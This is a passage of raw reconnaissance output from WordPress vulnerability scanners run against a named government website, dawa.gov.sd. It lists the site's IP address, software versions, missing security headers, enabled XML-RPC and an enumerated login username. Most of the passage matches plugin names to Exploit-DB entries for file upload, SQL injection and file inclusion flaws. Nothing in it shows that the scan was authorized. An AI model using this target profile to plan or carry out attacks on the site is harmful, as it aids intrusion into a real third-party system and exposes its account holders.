3152. | - http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5, Match: 'Version: 1.0'
3153.  
3154. [+] Enumerating Users (via Passive and Aggressive Methods)
3155. Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
3156.  
3157. [i] No Users Found.
3158.  
3159.  
3160. [+] Finished: Thu May 2 06:19:30 2019
3161. [+] Requests Done: 36
3162. [+] Cached Requests: 26
3163. [+] Data Sent: 5.495 KB
3164. [+] Data Received: 23.748 KB
3165. [+] Memory used: 94.168 MB
3166. [+] Elapsed time: 00:00:16
3167. #######################################################################################################################################
3168. [+] URL: http://dawa.gov.sd/
3169. [+] Started: Thu May 2 06:23:39 2019
3170.  
3171. Interesting Finding(s):
3172.  
3173. [+] http://dawa.gov.sd/
3174. | Interesting Entries:
3175. | - X-Powered-By: PHP/7.0.33, PleskLin
3176. | - X-Cache-Status: STALE
3177. | Found By: Headers (Passive Detection)
3178. | Confidence: 100%
3179.  
3180. [+] WordPress version 5.0.4 identified (Latest, released on 2019-03-13).
3181. | Detected By: Emoji Settings (Passive Detection)
3182. | - http://dawa.gov.sd/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4'
3183. | Confirmed By: Meta Generator (Passive Detection)
3184. | - http://dawa.gov.sd/, Match: 'WordPress 5.0.4'
3185.  
3186. [+] WordPress theme in use: dawa-child
3187. | Location: http://dawa.gov.sd/wp-content/themes/dawa-child/
3188. | Style URL: http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5
3189. | Style Name: dawa Child
3190. | Style URI: http://#
3191. | Description: dawa...
3192. | Author: Gasim
3193. | Author URI: http://#
3194. |
3195. | Detected By: Css Style (Passive Detection)
3196. |
3197. | Version: 1.0 (80% confidence)
3198. | Detected By: Style (Passive Detection)
3199. | - http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5, Match: 'Version: 1.0'
3200.  
3201. [+] Enumerating Users (via Passive and Aggressive Methods)
3202. Brute Forcing Author IDs - Time: 00:00:00 <============> (10 / 10) 100.00% Time: 00:00:00
3203.  
3204. [i] No Users Found.
3205.  
3206.  
3207. [+] Finished: Thu May 2 06:23:49 2019
3208. [+] Requests Done: 13
3209. [+] Cached Requests: 49
3210. [+] Data Sent: 1.927 KB
3211. [+] Data Received: 6.935 KB
3212. [+] Memory used: 94.375 MB
3213. [+] Elapsed time: 00:00:10
3214. #######################################################################################################################################
3215. [-] Date & Time: 02/05/2019 06:19:09
3216. [I] Threads: 5
3217. [-] Target: http://dawa.gov.sd (37.58.63.157)
3218. [M] Website Not in HTTPS: http://dawa.gov.sd
3219. [I] X-Powered-By: PHP/7.0.33
3220. [L] X-Frame-Options: Not Enforced
3221. [I] Strict-Transport-Security: Not Enforced
3222. [I] X-Content-Security-Policy: Not Enforced
3223. [I] X-Content-Type-Options: Not Enforced
3224. [L] Robots.txt Found: http://dawa.gov.sd/robots.txt
3225. [I] CMS Detection: WordPress
3226. [I] Wordpress Version: 5.0.4
3227. [I] Wordpress Theme: dawa
3228. [-] WordPress usernames identified:
3229. [M] adnum2
3230. [M] XML-RPC services are enabled
3231. [I] Autocomplete Off Not Found: http://dawa.gov.sd/wp-login.php
3232. [-] Default WordPress Files:
3233. [I] http://dawa.gov.sd/license.txt
3234. [I] http://dawa.gov.sd/readme.html
3235. [I] http://dawa.gov.sd/wp-content/themes/twentynineteen/readme.txt
3236. [I] http://dawa.gov.sd/wp-content/themes/twentyseventeen/README.txt
3237. [I] http://dawa.gov.sd/wp-content/themes/twentysixteen/genericons/COPYING.txt
3238. [I] http://dawa.gov.sd/wp-content/themes/twentysixteen/genericons/LICENSE.txt
3239. [I] http://dawa.gov.sd/wp-content/themes/twentysixteen/readme.txt
3240. [I] http://dawa.gov.sd/wp-includes/ID3/license.commercial.txt
3241. [I] http://dawa.gov.sd/wp-includes/ID3/license.txt
3242. [I] http://dawa.gov.sd/wp-includes/ID3/readme.txt
3243. [I] http://dawa.gov.sd/wp-includes/images/crystal/license.txt
3244. [I] http://dawa.gov.sd/wp-includes/js/plupload/license.txt
3245. [I] http://dawa.gov.sd/wp-includes/js/swfupload/license.txt
3246. [I] http://dawa.gov.sd/wp-includes/js/tinymce/license.txt
3247. [-] Searching Wordpress Plugins ...
3248. [I] "+plugin+"
3249. [I] $plugin
3250. [I] 1-flash-gallery
3251. [M] EDB-ID: 17801 "WordPress Plugin 1 Flash Gallery 1.30 < 1.5.7a - Arbitrary File Upload (Metasploit)"
3252. [I] 1-jquery-photo-gallery-slideshow-flash
3253. [M] EDB-ID: 36382 "WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting"
3254. [I] 2-click-socialmedia-buttons
3255. [M] EDB-ID: 37178 "WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities"
3256. [I] Calendar
3257. [M] EDB-ID: 21715 "WordPress Plugin spider Calendar - Multiple Vulnerabilities"
3258. [I] Calendar-Script
3259. [M] EDB-ID: 38018 "WordPress Plugin PHP Event Calendar - 'cid' SQL Injection"
3260. [I] Enigma2.php?boarddir=http:
3261. [I] FlagEm
3262. [M] EDB-ID: 38674 "WordPress Plugin FlagEm - 'cID' Cross-Site Scripting"
3263. [I] Lead-Octopus-Power
3264. [M] EDB-ID: 39269 "WordPress Plugin Lead Octopus Power - 'id' SQL Injection"
3265. [I] Premium_Gallery_Manager
3266. [M] EDB-ID: 34538 "WordPress Plugin Premium Gallery Manager - Configuration Access"
3267. [M] EDB-ID: 39111 "WordPress Plugin Premium Gallery Manager - Arbitrary File Upload"
3268. [I] Tevolution
3269. [M] EDB-ID: 40976 "WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload"
3270. [I] Ultimate_VC_Addons
3271. [I] a-gallery
3272. [M] EDB-ID: 17872 "Multiple WordPress Plugins - 'timthumb.php' File Upload"
3273. [I] a-to-z-category-listing
3274. [M] EDB-ID: 17809 "WordPress Plugin A to Z Category Listing 1.3 - SQL Injection"
3275. [I] abtest
3276. [M] EDB-ID: 39577 "WordPress Plugin Abtest - Local File Inclusion"
3277. [I] accept-signups
3278. [M] EDB-ID: 35136 "WordPress Plugin Accept Signups 0.1 - 'email' Cross-Site Scripting"
3279. [I] acf-frontend-display
3280. [I] ad-wizz
3281. [M] EDB-ID: 35561 "WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Cross-Site Scripting"
3282. [I] admin_panel.php?wp_footnotes_current_settings[post_footnotes]=&lt;
3283. /bin/sh: 1: lt: not found
3284. /bin/sh: 1: [&=/]: not found
3285. [I] admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=&lt;
3286. /bin/sh: 1: lt: not found
3287. /bin/sh: 1: [&=/]: not found
3288. [I] adminimize
3289. [M] EDB-ID: 36325 "WordPress Plugin Adminimize 1.7.21 - 'page' Cross-Site Scripting"
3290. [I] adrotate
3291. [M] EDB-ID: 17888 "WordPress Plugin AdRotate 3.6.5 - SQL Injection"
3292. [M] EDB-ID: 18114 "WordPress Plugin AdRotate 3.6.6 - SQL Injection"
3293. [M] EDB-ID: 31834 "WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph?track' SQL Injection"
3294. [I] ads-box
3295. [M] EDB-ID: 38060 "WordPress Plugin Ads Box - 'count' SQL Injection"
3296. [I] advanced-dewplayer
3297. [M] EDB-ID: 38936 "WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal"
3298. [I] advanced-text-widget
3299. [M] EDB-ID: 36324 "WordPress Plugin Advanced Text Widget 2.0 - 'page' Cross-Site Scripting"
3300. [I] advanced-uploader
3301. [M] EDB-ID: 38867 "WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities"
3302. [I] advertizer
3303. [M] EDB-ID: 17750 "WordPress Plugin Advertizer 1.0 - SQL Injection"
3304. [I] age-verification
3305. [M] EDB-ID: 18350 "WordPress Plugin Age Verification 0.4 - Open Redirect"
3306. [M] EDB-ID: 36540 "WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection"
3307. [I] ajax-category-dropdown
3308. [M] EDB-ID: 17207 "WordPress Plugin Ajax Category Dropdown 0.1.5 - Multiple Vulnerabilities"
3309. [I] ajax-store-locator-wordpress_0
3310. [M] EDB-ID: 35493 "WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download"
3311. [I] ajaxgallery
3312. [M] EDB-ID: 17686 "WordPress Plugin Ajax Gallery 3.0 - SQL Injection"
3313. [I] akismet
3314. [M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
3315. [M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
3316. [I] alert-before-your-post
3317. [M] EDB-ID: 36323 "WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting"
3318. [I] all-in-one-event-calendar
3319. [M] EDB-ID: 37075 "WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget-form.php?title' Cross-Site Scripting"
3320. [M] EDB-ID: 37076 "WordPress Plugin All-in-One Event Calendar 1.4 - 'box_publish_button.php?button_value' Cross-Site Scripting"
3321. [M] EDB-ID: 37077 "WordPress Plugin All-in-One Event Calendar 1.4 - 'save_successful.php?msg' Cross-Site Scripting"
3322. [M] EDB-ID: 37078 "WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Cross-Site Scripting Vulnerabilities"
3323. [I] all-in-one-wp-security-and-firewall
3324. [M] EDB-ID: 34854 "WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting"
3325. [I] all-video-gallery
3326. [M] EDB-ID: 22427 "WordPress Plugin All Video Gallery 1.1 - SQL Injection"
3327. [I] allow-php-in-posts-and-pages
3328. [M] EDB-ID: 17688 "WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection"
3329. [I] allwebmenus-wordpress-menu-plugin
3330. [M] EDB-ID: 17861 "WordPress Plugin AllWebMenus 1.1.3 - Remote File Inclusion"
3331. [M] EDB-ID: 18407 "WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload"
3332. [I] alo-easymail
3333. [I] annonces
3334. [M] EDB-ID: 17863 "WordPress Plugin Annonces 1.2.0.0 - Remote File Inclusion"
3335. [I] answer-my-question
3336. [M] EDB-ID: 40771 "WordPress Plugin Answer My Question 1.3 - SQL Injection"
3337. [I] appointment-booking-calendar
3338. [M] EDB-ID: 39309 "WordPress Plugin Booking Calendar Contact Form 1.1.23 - SQL Injection"
3339. [M] EDB-ID: 39319 "WordPress Plugin Booking Calendar Contact Form 1.1.23 - Shortcode SQL Injection"
3340. [M] EDB-ID: 39341 "WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities"
3341. [M] EDB-ID: 39342 "WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection"
3342. [I] aspose-doc-exporter
3343. [M] EDB-ID: 36559 "WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download"
3344. [I] asset-manager
3345. [M] EDB-ID: 18993 "WordPress Plugin Asset Manager 0.2 - Arbitrary File Upload"
3346. [I] audio
3347. [M] EDB-ID: 35258 "WordPress Plugin Audio 0.5.1 - 'showfile' Cross-Site Scripting"
3348. [I] audio-player
3349. [M] EDB-ID: 38300 "WordPress Plugin Audio Player - 'playerID' Cross-Site Scripting"
3350. [I] auto-attachments
3351. [I] aviary-image-editor-add-on-for-gravity-forms
3352. [M] EDB-ID: 37275 "WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload"
3353. [I] backwpup
3354. [M] EDB-ID: 35400 "WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities"
3355. [I] baggage-freight
3356. [M] EDB-ID: 46061 "WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload"
3357. [I] baggage_shipping
3358. [I] bbpress
3359. [M] EDB-ID: 22396 "WordPress Plugin bbPress - Multiple Vulnerabilities"
3360. [I] bezahlcode-generator
3361. [M] EDB-ID: 35286 "WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Cross-Site Scripting"
3362. [I] booking
3363. [M] EDB-ID: 27399 "WordPress Plugin Booking Calendar 4.1.4 - Cross-Site Request Forgery"
3364. [I] booking-calendar-contact-form
3365. [M] EDB-ID: 37003 "WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities"
3366. [I] bookx
3367. [M] EDB-ID: 39251 "WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion"
3368. [I] brandfolder
3369. [M] EDB-ID: 39591 "WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion"
3370. [I] cac-featured-content
3371. [I] candidate-application-form
3372. [M] EDB-ID: 37754 "WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download"
3373. [I] catalog
3374. [M] EDB-ID: 25724 "WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities"
3375. [M] EDB-ID: 38639 "WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities"
3376. [I] category-grid-view-gallery
3377. [M] EDB-ID: 38625 "WordPress Plugin Category Grid View Gallery - 'ID' Cross-Site Scripting"
3378. [I] category-list-portfolio-page
3379. [I] cevhershare
3380. [M] EDB-ID: 17891 "WordPress Plugin CevherShare 2.0 - SQL Injection"
3381. [I] cforms
3382. [M] EDB-ID: 34946 "WordPress Plugin cformsII 11.5/13.1 - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities"
3383. [I] cforms2
3384. [M] EDB-ID: 35879 "WordPress Plugin Cforms 14.7 - Remote Code Execution"
3385. [I] chenpress
3386. [M] EDB-ID: 37522 "WordPress Plugin chenpress - Arbitrary File Upload"
3387. [I] church-admin
3388. [M] EDB-ID: 37483 "WordPress Plugin church_admin - 'id' Cross-Site Scripting"
3389. [I] cimy-counter
3390. [M] EDB-ID: 14057 "WordPress Plugin Cimy Counter - Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting"
3391. [M] EDB-ID: 34195 "WordPress Plugin Cimy Counter 0.9.4 - HTTP Response Splitting / Cross-Site Scripting"
3392. [I] clickdesk-live-support-chat
3393. [M] EDB-ID: 36338 "WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting"
3394. [I] cloudsafe365-for-wp
3395. [M] EDB-ID: 37681 "WordPress Plugin Cloudsafe365 - 'file' Remote File Disclosure"
3396. [I] cm-download-manager
3397. [M] EDB-ID: 35324 "WordPress Plugin CM Download Manager 2.0.0 - Code Injection"
3398. [I] cms-pack
3399. [I] cnhk-slideshow
3400. [M] EDB-ID: 39190 "WordPress Plugin cnhk-Slideshow - Arbitrary File Upload"
3401. [I] comicpress-manager
3402. [M] EDB-ID: 35393 "WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Cross-Site Scripting"
3403. [I] comment-rating
3404. [M] EDB-ID: 16221 "WordPress Plugin Comment Rating 2.9.23 - Multiple Vulnerabilities"
3405. [M] EDB-ID: 24552 "WordPress Plugin Comment Rating 2.9.32 - Multiple Vulnerabilities"
3406. [M] EDB-ID: 36487 "WordPress Plugin Comment Rating 2.9.20 - 'path' Cross-Site Scripting"
3407. [I] community-events
3408. [M] EDB-ID: 17798 "WordPress Plugin Community Events 1.2.1 - SQL Injection"
3409. [I] complete-gallery-manager
3410. [M] EDB-ID: 28377 "WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload"
3411. [I] contact-form-generator
3412. [M] EDB-ID: 38086 "WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities"
3413. [I] contact-form-wordpress
3414. [M] EDB-ID: 17980 "WordPress Plugin Contact Form 2.7.5 - SQL Injection"
3415. [I] contus-hd-flv-player
3416. [M] EDB-ID: 17678 "WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection"
3417. [M] EDB-ID: 37377 "WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload"
3418. [I] contus-video-gallery
3419. [M] EDB-ID: 34161 "WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities"
3420. [I] contus-video-galleryversion-10
3421. [M] EDB-ID: 37373 "WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload"
3422. [I] copyright-licensing-tools
3423. [M] EDB-ID: 17749 "WordPress Plugin iCopyright(R) Article Tools 1.1.4 - SQL Injection"
3424. [I] count-per-day
3425. [M] EDB-ID: 17857 "WordPress Plugin Count per Day 2.17 - SQL Injection"
3426. [M] EDB-ID: 18355 "WordPress Plugin Count Per Day - Multiple Vulnerabilities"
3427. [M] EDB-ID: 20862 "WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting"
3428. [I] couponer
3429. [M] EDB-ID: 17759 "WordPress Plugin Couponer 1.2 - SQL Injection"
3430. [I] cp-polls
3431. [M] EDB-ID: 39513 "WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities"
3432. [I] cp-reservation-calendar
3433. [M] EDB-ID: 38187 "WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection"
3434. [I] cpl
3435. [M] EDB-ID: 11458 "WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection"
3436. [I] crawlrate-tracker
3437. [M] EDB-ID: 17755 "WordPress Plugin Crawl Rate Tracker 2.0.2 - SQL Injection"
3438. [I] crayon-syntax-highlighter
3439. [M] EDB-ID: 37946 "WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion"
3440. [I] custom-background
3441. [M] EDB-ID: 39135 "WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload"
3442. [I] custom-content-type-manager
3443. [M] EDB-ID: 19058 "WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload"
3444. [I] custom-tables
3445. [M] EDB-ID: 37482 "WordPress Plugin custom tables - 'key' Cross-Site Scripting"
3446. [I] cysteme-finder
3447. [M] EDB-ID: 40295 "WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload"
3448. [I] daily-maui-photo-widget
3449. [M] EDB-ID: 35673 "WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities"
3450. [I] db-backup
3451. [M] EDB-ID: 35378 "WordPress Plugin DB Backup - Arbitrary File Download"
3452. [I] disclosure-policy-plugin
3453. [M] EDB-ID: 17865 "WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion"
3454. [I] dm-albums
3455. [M] EDB-ID: 9043 "Adobe Flash Selection.SetSelection - Use-After-Free"
3456. [M] EDB-ID: 9048 "Adobe Flash TextField.replaceText - Use-After-Free"
3457. [I] dmsguestbook
3458. [I] downloads-manager
3459. [M] EDB-ID: 6127 "Pixel Studio 2.17 - Denial of Service (PoC)"
3460. [I] dp-thumbnail
3461. [I] drag-drop-file-uploader
3462. [M] EDB-ID: 19057 "WordPress Plugin drag and drop file upload 0.1 - Arbitrary File Upload"
3463. [I] dukapress
3464. [M] EDB-ID: 35346 "WordPress Plugin DukaPress 2.5.2 - Directory Traversal"
3465. [I] duplicator v1.3.0
3466. [M] EDB-ID: 38676 "WordPress Plugin Duplicator - Cross-Site Scripting"
3467. [M] EDB-ID: 44288 "WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting"
3468. [I] dzs-videogallery
3469. [M] EDB-ID: 29834 "WordPress Plugin dzs-videogallery - Arbitrary File Upload"
3470. [M] EDB-ID: 30063 "WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure"
3471. [M] EDB-ID: 39250 "WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection"
3472. [M] EDB-ID: 39553 "WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities"
3473. [I] dzs-zoomsounds
3474. [M] EDB-ID: 37166 "WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload"
3475. [I] easy-contact-form-lite
3476. [M] EDB-ID: 17680 "WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection"
3477. [I] easy-contact-forms-exporter
3478. [M] EDB-ID: 19013 "WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure"
3479. [I] ebook-download
3480. [M] EDB-ID: 39575 "WordPress Plugin eBook Download 1.1 - Directory Traversal"
3481. [I] eco-annu
3482. [M] EDB-ID: 38019 "WordPress Plugin Eco-annu - 'eid' SQL Injection"
3483. [I] editormonkey
3484. [M] EDB-ID: 17284 "WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload"
3485. [I] email-newsletter
3486. [M] EDB-ID: 37356 "WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure"
3487. [I] evarisk
3488. [M] EDB-ID: 17738 "WordPress Plugin Evarisk 5.1.3.6 - SQL Injection"
3489. [M] EDB-ID: 37399 "WordPress Plugin Evarisk - 'uploadPhotoApres.php' Arbitrary File Upload"
3490. [I] event-registration
3491. [M] EDB-ID: 17751 "WordPress Plugin Event Registration 5.4.3 - SQL Injection"
3492. [I] eventify
3493. [M] EDB-ID: 17794 "WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection"
3494. [I] extend-wordpress
3495. [I] facebook-opengraph-meta-plugin
3496. [M] EDB-ID: 17773 "WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection"
3497. [I] fbgorilla
3498. [M] EDB-ID: 39283 "WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection"
3499. [I] fbpromotions
3500. [M] EDB-ID: 17737 "WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection"
3501. [I] fcchat
3502. [M] EDB-ID: 35289 "WordPress Plugin FCChat Widget 2.1.7 - 'path' Cross-Site Scripting"
3503. [M] EDB-ID: 37370 "WordPress Plugin FCChat Widget 2.2.x - 'upload.php' Arbitrary File Upload"
3504. [I] feature-slideshow
3505. [M] EDB-ID: 35285 "WordPress Plugin Feature Slideshow 1.0.6 - 'src' Cross-Site Scripting"
3506. [I] featurific-for-wordpress
3507. [M] EDB-ID: 36339 "WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting"
3508. [I] feed
3509. [M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
3510. [I] feedlist
3511. [M] EDB-ID: 34973 "WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting"
3512. [I] feedweb
3513. [M] EDB-ID: 38414 "WordPress Plugin Feedweb - 'wp_post_id' Cross-Site Scripting"
3514. [I] fgallery
3515. [M] EDB-ID: 4993 "GitList 0.6.0 - Argument Injection (Metasploit)"
3516. [I] file-groups
3517. [M] EDB-ID: 17677 "WordPress Plugin File Groups 1.1.2 - SQL Injection"
3518. [I] filedownload
3519. [M] EDB-ID: 17858 "WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure"
3520. [I] finder
3521. [M] EDB-ID: 37677 "WordPress Plugin Finder - 'order' Cross-Site Scripting"
3522. [I] firestats
3523. [M] EDB-ID: 14308 "WordPress Plugin Firestats - Remote Configuration File Download"
3524. [M] EDB-ID: 33367 "WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)"
3525. [M] EDB-ID: 33368 "WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)"
3526. [I] flash-album-gallery
3527. [M] EDB-ID: 16947 "WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities"
3528. [M] EDB-ID: 36383 "WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting"
3529. [M] EDB-ID: 36434 "WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting"
3530. [M] EDB-ID: 36444 "WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting"
3531. [I] flexible-custom-post-type
3532. [M] EDB-ID: 36317 "WordPress Plugin Flexible Custom Post Type - 'id' Cross-Site Scripting"
3533. [I] flipbook
3534. [M] EDB-ID: 37452 "WordPress Plugin Flip Book - 'PHP.php' Arbitrary File Upload"
3535. [I] font-uploader
3536. [M] EDB-ID: 18994 "WordPress Plugin Font Uploader 1.2.4 - Arbitrary File Upload"
3537. [I] formcraft
3538. [M] EDB-ID: 30002 "WordPress Plugin Formcraft - SQL Injection"
3539. [I] forum-server
3540. [M] EDB-ID: 16235 "WordPress Plugin Forum Server 1.6.5 - SQL Injection"
3541. [M] EDB-ID: 17828 "WordPress Plugin Forum Server 1.7 - SQL Injection"
3542. [I] foxypress
3543. [M] EDB-ID: 18991 "WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload"
3544. [M] EDB-ID: 22374 "WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities"
3545. [I] front-end-upload
3546. [M] EDB-ID: 19008 "WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload"
3547. [I] front-file-manager
3548. [M] EDB-ID: 19012 "WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload"
3549. [I] fs-real-estate-plugin
3550. [M] EDB-ID: 22071 "WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection"
3551. [I] gallery-images
3552. [M] EDB-ID: 34524 "WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection"
3553. [M] EDB-ID: 39807 "WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities"
3554. [I] gallery-plugin
3555. [M] EDB-ID: 18998 "WordPress Plugin Gallery 3.06 - Arbitrary File Upload"
3556. [M] EDB-ID: 38209 "WordPress Plugin Gallery - 'filename_1' Arbitrary File Access"
3557. [I] gd-star-rating
3558. [M] EDB-ID: 17973 "WordPress Plugin GD Star Rating 1.9.10 - SQL Injection"
3559. [M] EDB-ID: 35373 "WordPress Plugin GD Star Rating 1.9.7 - 'wpfn' Cross-Site Scripting"
3560. [M] EDB-ID: 35835 "WordPress Plugin GD Star Rating - 'votes' SQL Injection"
3561. [I] gift-voucher
3562. [M] EDB-ID: 45255 "WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection"
3563. [I] global-content-blocks
3564. [M] EDB-ID: 17687 "WordPress Plugin Global Content Blocks 1.2 - SQL Injection"
3565. [I] global-flash-galleries
3566. [M] EDB-ID: 39059 "WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload"
3567. [I] google-document-embedder
3568. [M] EDB-ID: 35371 "WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection"
3569. [M] EDB-ID: 35447 "WordPress Plugin Google Document Embedder 2.5.16 - 'mysql_real_escpae_string' Bypass SQL Injection"
3570. [I] google-mp3-audio-player
3571. [M] EDB-ID: 35460 "WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download"
3572. [I] gracemedia-media-player
3573. [M] EDB-ID: 46537 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion"
3574. [I] grapefile
3575. [M] EDB-ID: 17760 "WordPress Plugin grapefile 1.1 - Arbitrary File Upload"
3576. [I] gwolle-gb
3577. [M] EDB-ID: 38861 "WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion"
3578. [I] hb-audio-gallery-lite
3579. [M] EDB-ID: 39589 "WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download"
3580. [I] hd-webplayer
3581. [M] EDB-ID: 20918 "WordPress Plugin HD Webplayer 1.1 - SQL Injection"
3582. [I] history-collection
3583. [M] EDB-ID: 37254 "WordPress Plugin History Collection 1.1.1 - Arbitrary File Download"
3584. [I] hitasoft_player
3585. [M] EDB-ID: 38012 "WordPress Plugin FLV Player - 'id' SQL Injection"
3586. [I] html5avmanager
3587. [M] EDB-ID: 18990 "WordPress Plugin HTML5 AV Manager 0.2.7 - Arbitrary File Upload"
3588. [I] i-dump-iphone-to-wordpress-photo-uploader
3589. [M] EDB-ID: 36691 "WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload"
3590. [I] iframe-admin-pages
3591. [M] EDB-ID: 37179 "WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting"
3592. [I] igit-posts-slider-widget
3593. [M] EDB-ID: 35392 "WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Cross-Site Scripting"
3594. [I] image-export
3595. [M] EDB-ID: 39584 "WordPress Plugin Image Export 1.1.0 - Arbitrary File Disclosure"
3596. [I] image-gallery-with-slideshow
3597. [M] EDB-ID: 17761 "WordPress Plugin image Gallery with Slideshow 1.5 - Multiple Vulnerabilities"
3598. [I] imdb-widget
3599. [M] EDB-ID: 39621 "WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion"
3600. [I] inboundio-marketing
3601. [M] EDB-ID: 36478 "WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload"
3602. [I] indeed-membership-pro
3603. [I] inline-gallery
3604. [M] EDB-ID: 35418 "WordPress Plugin Inline Gallery 0.3.9 - 'do' Cross-Site Scripting"
3605. [I] insert-php
3606. [M] EDB-ID: 41308 "WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection"
3607. [I] invit0r
3608. [M] EDB-ID: 37403 "WordPress Plugin Invit0r - 'ofc_upload_image.php' Arbitrary File Upload"
3609. [I] ip-logger
3610. [M] EDB-ID: 17673 "WordPress Plugin IP-Logger 3.0 - SQL Injection"
3611. [I] is-human
